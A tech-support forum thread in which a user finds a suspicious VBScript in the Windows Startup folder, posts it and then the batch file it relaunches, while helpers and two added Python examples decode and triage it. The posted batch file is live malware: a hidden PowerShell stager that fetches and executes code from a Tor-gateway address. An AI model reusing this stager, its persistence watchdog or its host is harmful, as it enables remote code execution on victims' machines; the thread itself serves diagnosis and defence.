Task Manager config app

GalaxY_2

Commendable
Aug 20, 2016
5
0
1,510
Hey there. Not so recently I realized I have an unknown app in Task Manager's Startup tab, called "config". It doesn't have an icon, and if I open the file location it leads to a VB script file. Does anyone know what this is? I can post the script if it helps.
 

GalaxY_2

Aug 20, 2016


C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

That's the file location.

I have it disabled because I don't know what that is.

Dim WinScriptHost
WScript.Sleep(30000)
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0
While True
set service = GetObject ("winmgmts:")
running = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = "powershell.exe" then
running = running + 1
End If
next
If running < 1 then
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0
End If
WScript.Sleep(120000)
Wend
Set WinScriptHost = Nothing

And this is the script itself. That's all I can find about it for now.
 
Are you able to open file.bat in the Line 4 pathname?

Wondering what that .bat file might be. I.e., the commands inside.....

Use Notepad to view.

Overall, the script is looking for and counting Powershell processes

Script seems to be built around the following link:

https://serverfault.com/questions/9038/run-a-bat-file-in-a-scheduled-task-without-a-window

See the script alongside "139".

The script you found may be some "prank" or simulated virus, or just an exercise in general....

Just need to understand what file.bat is doing.....

Then unravel it all.
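A defender-side view of the chain the reply above is unravelling (a .vbs in the Startup folder that runs a .bat, which in turn starts PowerShell): the Python below is an added example and is not part of the thread. It scans constructed process-creation records for a PowerShell process started with hidden or encoded switches and reports its parent chain, whether a script host (wscript.exe/cscript.exe) sits in that chain, and whether the Startup folder appears in an ancestor's command line. The record layout, PIDs, the user name "alice" and the short base64 placeholder are assumptions made for the example.

```python
"""Find the process chain this thread describes (a script in the Startup
folder launching a .bat that starts a hidden, encoded PowerShell) in
process-creation records. Added example, not from the thread."""
import ntpath
import re

# Constructed records in a Sysmon-like shape (pid, parent pid, image, command
# line). PIDs, the user "alice" and the base64 placeholder "QQBB" are made up;
# the file names follow the thread.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Roaming\Microsoft\Windows'
                r'\Start Menu\Programs\Startup\config.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\appdata\file.bat"'},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc QQBB"},
    # Benign contrast: an interactive PowerShell opened from the desktop shell.
    {"pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
]

# Launcher switches that together mean "run unseen, from an encoded blob".
SUSPICIOUS_FLAGS = (
    r"-w(?:indowstyle)?\s+hidden",
    r"-e(?:c|nc|ncodedcommand)?\s+\S",
    r"-ex(?:ec|ecutionpolicy)?\s+bypass",
    r"-noni(?:nteractive)?\b",
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def _image_name(path):
    return ntpath.basename(path).lower()


def ancestry(by_pid, pid):
    """Records from the given process up to the oldest ancestor we have."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def find_hidden_encoded_powershell(events):
    """Return one finding per PowerShell process started with suspicious
    switches, annotated with its parent chain and persistence clues."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if _image_name(ev["image"]) != "powershell.exe":
            continue
        hits = sum(1 for p in SUSPICIOUS_FLAGS if re.search(p, ev["cmdline"], re.I))
        if hits == 0:
            continue
        chain = ancestry(by_pid, ev["pid"])
        names = [_image_name(e["image"]) for e in chain]
        findings.append({
            "pid": ev["pid"],
            "chain": names,
            "suspicious_flags": hits,
            "via_script_host": any(n in SCRIPT_HOSTS for n in names),
            "from_startup_folder": any(STARTUP_DIR in e["cmdline"].lower() for e in chain),
            "wow64_powershell": "syswow64" in ev["image"].lower(),
        })
    return findings


if __name__ == "__main__":
    for f in find_hidden_encoded_powershell(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {' <- '.join(f['chain'])}")
        print(f"  flags={f['suspicious_flags']} script_host={f['via_script_host']} "
              f"startup={f['from_startup_folder']} wow64={f['wow64_powershell']}")
```

Run against the sample records it reports only pid 400, with the chain powershell.exe <- cmd.exe <- wscript.exe <- explorer.exe, all four switches present, a script host in the chain and the Startup folder in an ancestor's command line; the interactive PowerShell (pid 500) is not reported. The same logic maps directly onto Sysmon Event ID 4688/Sysmon ID 1 fields in a SIEM.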
 

GalaxY_2

Aug 20, 2016


Well, I didn't find any .bat files, only folders with stuff that I have installed :| Should I be worried about this config file? Should I delete it or what? I don't understand a thing about scripts and stuff.
 
If your system has not had any problems with the script being disabled then all should be well.

As for the missing .bat file: does anyone else use your computer and have their own user account? The .bat file may be in one of their folders. Or the .bat could have already been deleted.

What to do:

Move the script to some "quarantine" folder of your own making. At some time in the future you will just delete the script. Very unlikely that the script is serving any real or beneficial purpose.

If something starts asking for the script file or reports it "missing" then post accordingly.

Be sure to include "what" is asking for or looking for the script.

 

GalaxY_2

Aug 20, 2016


@echo off
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )
if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )


I found this file.bat. Any idea what this is? :)
 
Going out of my comfort zone but will share my assessment.

Those lines with "START" are looking at your processor and then launching Powershell and apparently hiding the fact.

Reference the command line parameters listed in the following link:


https://docs.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help?view=powershell-6

As for all the rest..... some sort of code that Powershell is apparently expected to execute. Or some exploit or vulnerability due to Powershell running. What the code is actually to do - I cannot answer.

All in all, I do not see any legitimate use for the script file file.bat.

I would delete both and keep checking that they do not reappear. And run a few extra AV/malware scans as well.

Someone else following this thread may be able to offer additional insight and comment. No problem with that on my end.
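The open question in the reply above (what the encoded part asks PowerShell to do) can be answered by decoding the -Enc argument: powershell.exe expects it as base64 over UTF-16LE text. The Python below is an added example and is not from the thread. It takes the two launcher lines quoted in the post (the base64 blob is copied verbatim from them, everything else is constructed), decodes the command, pulls out any URL and labels the behaviours a triage analyst would flag. The function names and indicator labels are this example's own.

```python
"""Decode and triage the PowerShell launcher lines from the batch file quoted
in this thread. Added example, not from the thread; the base64 blob is copied
verbatim from the post, everything else is this example's own construction."""
import base64
import re
from typing import Optional

# The -Enc argument exactly as it appears in both lines of the posted .bat.
ENC_BLOB = (
    "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoA"
    "UwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4A"
    "QwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgA"
    "TgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQA"
    "bwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUA"
    "cQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwA"
    "ZQBUAHIAVwBIAHoASQBxACIAKQAKAA=="
)

# The two launcher lines as posted (x86 and AMD64 branches of the .bat).
BAT_LAUNCHERS = {
    "x86": "START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + ENC_BLOB,
    "AMD64": r"START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe"
             " -NoP -NonI -W Hidden -Exec Bypass -Enc " + ENC_BLOB,
}

# (regex, label) pairs checked against the launcher line itself ...
LAUNCHER_INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden", "window hidden from the user"),
    (r"-ex(?:ec|ecutionpolicy)?\s+bypass", "execution policy bypassed"),
    (r"-noni(?:nteractive)?\b", "non-interactive session"),
    (r"-nop(?:rofile)?\b", "user profile skipped"),
    (r"\bstart\s+/b\b", "started without a console window"),
    (r"syswow64", "32-bit PowerShell forced on a 64-bit host"),
]
# ... and against the decoded script.
SCRIPT_INDICATORS = [
    (r"servercertificatevalidationcallback\s*=\s*\{\s*\$true\s*\}",
     "TLS certificate validation disabled"),
    (r"\b(?:iex|invoke-expression)\b", "fetched text executed in memory"),
    (r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod",
     "remote content downloaded"),
    (r"\.onion\b", "Tor hidden-service address (through a clearnet gateway)"),
]


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 argument of -e/-ec/-enc/-EncodedCommand, if any.
    '-Exec Bypass' does not match because no whitespace follows '-E'."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return m.group(1) if m else None


def decode_encoded_command(blob: str) -> str:
    """powershell.exe -EncodedCommand takes base64 over UTF-16LE text."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def triage_launcher(cmdline: str) -> dict:
    """Decode the launcher and list the behaviours worth flagging."""
    blob = extract_encoded_command(cmdline)
    script = decode_encoded_command(blob) if blob else ""
    indicators = [label for pat, label in LAUNCHER_INDICATORS
                  if re.search(pat, cmdline, re.I)]
    indicators += [label for pat, label in SCRIPT_INDICATORS
                   if re.search(pat, script, re.I)]
    urls = re.findall(r"""https?://[^\s"')]+""", script)
    return {"decoded": script, "urls": urls, "indicators": indicators}


if __name__ == "__main__":
    for arch, line in BAT_LAUNCHERS.items():
        result = triage_launcher(line)
        print(f"[{arch}] decoded command:\n{result['decoded'].rstrip()}")
        print("  urls:", result["urls"])
        for label in result["indicators"]:
            print("  -", label)
```

Decoding shows two statements: the first sets the process-wide certificate validation callback to always return $true, so any TLS server is trusted; the second fetches text from an address under the .onion.to Tor gateway and hands it straight to Invoke-Expression. Together with the hidden window, the bypassed execution policy and the VBScript watchdog that restarts the .bat whenever no powershell.exe is running, this is a download-and-execute stager with persistence, not a configuration utility, which supports the advice above to delete both files, keep checking that they do not return, and run additional scans.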